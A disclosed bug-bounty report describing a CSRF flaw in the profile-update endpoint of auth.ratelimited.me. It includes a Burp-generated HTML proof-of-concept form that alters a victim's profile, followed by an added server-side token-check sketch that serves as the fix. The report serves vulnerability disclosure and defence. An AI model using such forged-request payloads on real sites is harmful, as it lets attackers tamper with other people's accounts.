Cross Site Request Forgery in auth in https://auth.ratelimited.me/

Disclosed: 2020-02-21 11:23:43 By miguel_santareno To ratelimited
Medium
Vulnerability Details
Hi there, I found a vulnerable POST with which an attacker can execute CSRF against the victim.

Steps to reproduce:

1. Log in to your account and, with Burp on, intercept the update profile request.

   csrf1.jpg

2. Send the POST request to the CSRF PoC generator and alter the details.

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://auth.ratelimited.me/profile/details/update" method="POST">
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="&#95;token" value="gTAHVqBk8TI4QlPBHku3gec3Aly0oD2vITwuEvot" />
      <input type="hidden" name="first&#95;name" value="teste csrf" />
      <input type="hidden" name="last&#95;name" value="teste csrf" />
      <input type="hidden" name="birthday" value="2008&#45;12&#45;28" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="address" value="teste csrf" />
      <input type="hidden" name="country&#95;id" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

3. Save the HTML and open it in the browser, and you will see the victim's details changing.

   teste.html

## Impact

An attacker can manipulate victim information. A CSRF token should be implemented, and in case of implementation it should be random.
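The recommendation above (a random CSRF token), sketched as a server-side check. This is an added example, not part of the original report and not ratelimited's code. The session dictionary, the function names and the extra `Origin` check are assumptions; the field names `_token` and `_method` and the origin come from the report's form.

```python
import hmac
import secrets

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
TRUSTED_ORIGIN = "https://auth.ratelimited.me"  # origin of the report's form action

def issue_csrf_token(session: dict) -> str:
    """Create one unpredictable token per session and keep it server-side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)  # 32 bytes from the OS CSPRNG
    return session["csrf_token"]

def effective_method(method: str, form: dict) -> str:
    """Resolve the `_method` override used by the report's form (POST carrying PUT)."""
    override = form.get("_method", "").upper()
    return override if method.upper() == "POST" and override in STATE_CHANGING else method.upper()

def check_request(session: dict, method: str, form: dict, headers: dict) -> tuple:
    """Return (allowed, reason) for a request checked against the session's token."""
    if effective_method(method, form) not in STATE_CHANGING:
        return True, "safe method"
    origin = headers.get("Origin")  # assumption: used only as an extra check when present
    if origin is not None and origin != TRUSTED_ORIGIN:
        return False, "cross-origin request"
    expected = session.get("csrf_token")
    submitted = form.get("_token", "")
    if not expected or not submitted:
        return False, "missing token"
    # Constant-time comparison against the token bound to this session only.
    if not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "token mismatch"
    return True, "ok"

# Constructed sample: field names mirror the report's form, values are made up.
def demo() -> list:
    victim = {}
    token = issue_csrf_token(victim)
    form = {"_method": "PUT", "first_name": "teste csrf"}
    return [
        check_request(victim, "POST", {**form, "_token": token}, {"Origin": TRUSTED_ORIGIN}),
        check_request(victim, "POST", {**form, "_token": "attacker-chosen"}, {}),
        check_request(victim, "POST", form, {"Origin": "https://attacker.example"}),
    ]
```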
Report Stats
  • Report ID: 473798
  • State: Closed
  • Substate: resolved
  • Upvotes: 6